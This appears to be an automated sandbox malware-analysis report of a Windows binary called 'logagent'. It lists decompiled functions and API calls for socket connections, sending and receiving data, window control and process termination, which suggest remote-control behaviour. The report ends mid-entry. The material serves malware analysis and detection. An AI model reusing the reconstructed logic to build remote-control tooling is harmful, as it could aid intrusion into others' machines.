                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040AD30
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040AD44
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                    • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                    • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                    • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                    • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040AD6F,00000000,?,?,?,?,?,?), ref: 0040AD5B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040AD64
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??4?$basic_string@Y?$basic_string@connectfreemallocrecvsocket
                                  • String ID:
                                  • API String ID: 901373779-0
                                  • Opcode ID: 334f91976ac30dc480e8cbec4ad1dca18011177d7e33d4e976a775bd4afbe7dd
                                  • Instruction ID: 7b2f1eb0bf348bc8e64f130e1c0075fbfd626f93203aeb1fcbfc33f5f8d0b54a
                                  • Opcode Fuzzy Hash: 334f91976ac30dc480e8cbec4ad1dca18011177d7e33d4e976a775bd4afbe7dd
                                  • Instruction Fuzzy Hash: 4C01F272A0020867C700BF6AEC4B9EF7B2DDF94755F00043ABD02AB1C2EBB5595C82D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DB3C Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040DB4D
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB87
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB9B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@??1?$basic_string@$??4?$basic_string@V01@connectsocket
                                  • String ID:
                                  • API String ID: 1130490860-0
                                  • Opcode ID: 187dd77ae07796d47033cb0c66226a999a2e014d3950e60fa145c5b80a05b893
                                  • Instruction ID: e4a4367fee434e29a8f43c0c5b5fd0ad89fe5f7d667a2954b88e43abb6528f81
                                  • Opcode Fuzzy Hash: 187dd77ae07796d47033cb0c66226a999a2e014d3950e60fa145c5b80a05b893
                                  • Instruction Fuzzy Hash: E301CC3260020C8BC300BBF5AC5A5EF3722DB85354B5084BBEA126B1D1CBBC0888869E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405C62 Relevance: 7.5, APIs: 5, Instructions: 42synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00405C62(void* __ecx) {
				long _t7;
				void* _t10;
				void* _t18;
				void* _t19;

				_t18 = __ecx;
				_t7 = CreateEventA(0, 0, 0, 0);
				 *(_t18 + 0x34) = _t7;
				if( *((char*)(_t18 + 0x3d)) != 0) {
					_t10 = _t18 + 0x14;
					do {
						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x415664);
						if(_t7 != 0) {
							_t19 = _t19 - 0x10;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
							E004020C2(0x41be70, 0x5a, _t10);
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
						}
						_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff);
					} while ( *((char*)(_t18 + 0x3d)) != 0);
				}
				return 1;
			}







                                  0x00405c6a
                                  0x00405c6d
                                  0x00405c77
                                  0x00405c7a
                                  0x00405c7c
                                  0x00405c84
                                  0x00405c86
                                  0x00405c90
                                  0x00405c92
                                  0x00405c98
                                  0x00405ca5
                                  0x00405cad
                                  0x00405cad
                                  0x00405cb8
                                  0x00405cbe
                                  0x00405c84
                                  0x00405cc9

                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004052B3), ref: 00405C6D
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405C86
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405C98
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,0000005A), ref: 00405CAD
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405CB8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                  • String ID:
                                  • API String ID: 2456067102-0
                                  • Opcode ID: 0d899be78884d94ce1c1d17b2caedbeea4029945f3674705747b8005b05b442e
                                  • Instruction ID: 941b29cc010242a65ed123258a0f7c68229dc58979b588812575d9674897e9d1
                                  • Opcode Fuzzy Hash: 0d899be78884d94ce1c1d17b2caedbeea4029945f3674705747b8005b05b442e
                                  • Instruction Fuzzy Hash: 3BF0C875500B00BFE71017249D88AE73BADEB81321B44993EF45296AD1CB755C448F74
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412981 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00412996
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004129A8
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004129B4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004129D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004129DE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 1435062097-0
                                  • Opcode ID: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                  • Instruction ID: ff140a25c5046e2b9097d957d6cdce37f73a2c16b69e3829c68fb2596ec2fa1c
                                  • Opcode Fuzzy Hash: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                  • Instruction Fuzzy Hash: 5101847650025EEFCB009F68DC889EE7BBCFF89310F008455EC5697291D7749645CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412B4A Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000,00409B39,6DF7CB60), ref: 00412B5E
                                  • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00412B7E
                                  • CloseHandle.KERNEL32(00000000), ref: 00412B89
                                  • CloseHandle.KERNEL32(00000000), ref: 00412B9A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleV?$allocator@$??0?$basic_string@FileG@1@@G@2@@std@@G@std@@ModuleNameOpenProcessU?$char_traits@
                                  • String ID:
                                  • API String ID: 788797586-0
                                  • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction ID: ad3219438425194a21685df614a361962293db7adaf2229f34b8827cc35eabff
                                  • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction Fuzzy Hash: 40F0A435644519FBDB119F50DD48FDA376CEB04701F008162F90ADA151DBB0FA418B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004050FC Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040510A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405117
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405124
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405131
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040513E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                  • String ID:
                                  • API String ID: 1622488342-0
                                  • Opcode ID: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                  • Instruction ID: 6e933e02768027194ec3cb2a5611c35ee588213e6c767ddfd1f1ad46262d6be2
                                  • Opcode Fuzzy Hash: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                  • Instruction Fuzzy Hash: 37F01D71504A5EDFCB14CFE4D9489DABBFCAA58249300486D9593C3500E670F20DCB20
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402526 Relevance: 7.5, APIs: 5, Instructions: 34networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 00402530
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 0040253F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041B310,?,004040BC,00000056,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00402552
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • closesocket.WS2_32(00000000), ref: 0040256A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402575
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@closesocketconnectsendsocket
                                  • String ID:
                                  • API String ID: 3330461409-0
                                  • Opcode ID: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                  • Instruction ID: d3ca73ae3b273f0ad2b6a7631a0cd8f88755cf7fea3d905b6ba3b72b83ddc57b
                                  • Opcode Fuzzy Hash: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                  • Instruction Fuzzy Hash: F4F08231A4021876DB107AA6DC0EFDE7A088F517B4F004126FD25A61D2D6B94A9086DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D817 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0040D817(void* __eflags) {
				char* _t8;
				void* _t25;

				_t8 = E0040180C(_t25 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);
				E004126BC( *(_t25 - 0x2c));
				E0040EBBE();
				E004017DD(_t25 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                  0x0040d820
                                  0x0040d827
                                  0x0040d836
                                  0x0040d83f
                                  0x0040e51b
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
                                  • atoi.MSVCRT ref: 0040D82E
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
                                    • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                    • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                    • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                    • Part of subcall function 0040EBBE: EnumWindows.USER32(0040EA96,00000000), ref: 0040EBD5
                                    • Part of subcall function 0040EBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BE60), ref: 0040EBE5
                                    • Part of subcall function 0040EBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000063), ref: 0040EC01
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                  • String ID:
                                  • API String ID: 2919580351-0
                                  • Opcode ID: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                  • Instruction ID: 7c517d206c8b3613f115d3eb8ec4858c415f79e5c2237a3465432eab5c7cfc94
                                  • Opcode Fuzzy Hash: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                  • Instruction Fuzzy Hash: 88F0F872900519DFCB04ABF1EC599EDB734EB9431AB10883AE112A20E1EA785555CB2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412100 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412117
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041212B
                                  • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00416C00,6DF55DF8), ref: 00412140
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0041214F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412158
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                  • String ID:
                                  • API String ID: 758954411-0
                                  • Opcode ID: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                  • Instruction ID: 88ce2cb358dffa7750e3bac2ad7a8a5a8ee651c39e1957481fcccb9e80397935
                                  • Opcode Fuzzy Hash: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                  • Instruction Fuzzy Hash: 51F0B77554050FEFDB00DB90ED49FED7778EB54309F1080A1F506A61A0EAB0AA49CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D813 Relevance: 7.5, APIs: 5, Instructions: 26COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                  • atoi.MSVCRT ref: 0040E4B9
                                  • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                  • String ID:
                                  • API String ID: 4290155986-0
                                  • Opcode ID: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                  • Instruction ID: 20fcfc763774574552f6a97477b9112486ef0cdd22c9f36fb94fc0668df3d9e8
                                  • Opcode Fuzzy Hash: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                  • Instruction Fuzzy Hash: 05E0C932A10618CBDB04ABE1EC5DAEDB734FB94316F10883AE113A60E1EBB85555DA19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D80A Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                  • atoi.MSVCRT ref: 0040E4B9
                                  • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                  • String ID:
                                  • API String ID: 4290155986-0
                                  • Opcode ID: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
